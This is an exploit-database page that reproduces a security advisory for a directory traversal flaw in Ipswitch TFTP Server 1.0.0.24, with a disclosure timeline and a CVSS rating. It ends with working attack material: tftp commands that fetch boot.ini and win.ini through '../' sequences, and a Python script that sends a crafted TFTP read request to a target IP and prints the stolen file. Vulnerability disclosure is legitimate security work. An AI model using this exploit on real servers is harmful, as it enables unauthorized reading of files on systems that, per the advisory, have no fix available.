[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Ipswitch TFTP Server Directory Traversal Vulnerability

Author
secpod
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-17226
Category
remote exploits
Date add
02-12-2011
Platform
windows
##############################################################################
# Title     : Ipswitch TFTP Server Directory Traversal Vulnerability
# Author    : Prabhu S Angadi from SecPod Technologies (www.secpod.com)
# Vendor    : http://www.whatsupgold.com/index.aspx
# Advisory  : http://secpod.org/blog/?p=424
#             http://secpod.org/advisories/SecPod_Ipswitch_TFTP_Server_Dir_Trav.txt
#             http://secpod.org/exploits/SecPod_Ipswitch_TFTP_Server_Dir_Trav_POC.py
# Version   : Ipswitch TFTP Server 1.0.0.24
# Date      : 02/12/2011
##############################################################################
 
SecPod ID: 1028                 13/09/2011 Issue Discovered
                        04/10/2011 Vendor Notified
                        No Response from Vendor
                        02/12/2011 Advisory Released
 
 
Class: Information Disclosure                   Severity: Medium
 
 
Overview:
---------
Ipswitch TFTP Server 1.0.0.24 is prone to a directory traversal
vulnerability.
 
 
Technical Description:
----------------------
The vulnerability is caused due to improper validation to Read Request
containing '../' sequences, which allows attackers to read arbitrary
files.
 
 
Impact:
--------
Successful exploitation could allow an attacker to obtain sensitive
information.
 
 
Affected Software:
------------------
Ipswitch TFTP Server 1.0.0.24
 
 
Tested on:
-----------
Ipswitch TFTP Server 1.0.0.24 on Windows XP SP3 & Windows 7.
 
 
References:
-----------
http://www.ipswitch.com/
http://secpod.org/blog/?p=424
http://www.whatsupgold.com/index.aspx
http://secpod.org/advisories/SecPod_Ipswitch_TFTP_Server_Dir_Trav.txt
http://secpod.org/exploits/SecPod_Ipswitch_TFTP_Server_Dir_Trav_POC.py
 
 
Download Link:
--------------
http://www.whatsupgold.com/free-software/network-tools/tftp-server.aspx
 
 
Proof of Concept:
----------------
tftp> get ../../../../../../../../../../../boot.ini
tftp> get ../../../../../../../../../../../windows/win.ini
 
 
Solution:
----------
Not available
 
 
Risk Factor:
-------------
    CVSS Score Report:
        ACCESS_VECTOR          = NETWORK
        ACCESS_COMPLEXITY      = LOW
        AUTHENTICATION         = NOT_REQUIRED
        CONFIDENTIALITY_IMPACT = PARTIAL
        INTEGRITY_IMPACT       = NONE
        AVAILABILITY_IMPACT    = NONE
        EXPLOITABILITY         = PROOF_OF_CONCEPT
        REMEDIATION_LEVEL      = UNAVAILABLE
        REPORT_CONFIDENCE      = CONFIRMED
        CVSS Base Score        = 5.0 (AV:N/AC:L/Au:NR/C:P/I:N/A:N)
        CVSS Temporal Score    = 4.5
        Risk factor            = Medium
 
 
Credits:
--------
Prabhu S Angadi of SecPod Technologies has been credited with the discovery of
this vulnerability.
 
 
POC :
======
import sys, socket
 
def sendPacket(HOST, PORT, data):
    '''
    Sends UDP Data to a Particular Host on a Specified Port
    with a Given Data and Return the Response
    '''
    udp_sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    udp_sock.sendto(data, (HOST, PORT))
    data = udp_sock.recv(1024)
    udp_sock.close()
    return data
 
if __name__ == "__main__":
 
    if len(sys.argv) < 2:
        print '\tUsage: python exploit.py target_ip'
        print '\tExample : python exploit.py 127.0.0.1'
        print '\tExiting...'
        sys.exit(0)
 
    HOST = sys.argv[1]                               ## The Server IP
    PORT = 69                                        ## Default TFTP port
 
    data = "\x00\x01"                                ## TFTP Read Request
    data += "../" * 10 + "boot.ini" + "\x00"         ## Read boot.ini file using directory traversal
    data += "netascii\x00"                           ## TFTP Type
 
    ## netascii
    rec_data = sendPacket(HOST, PORT, data)
    print "Data Found on the target : %s " %(HOST)
    print rec_data.strip()



#  0day.today [2024-12-24]  #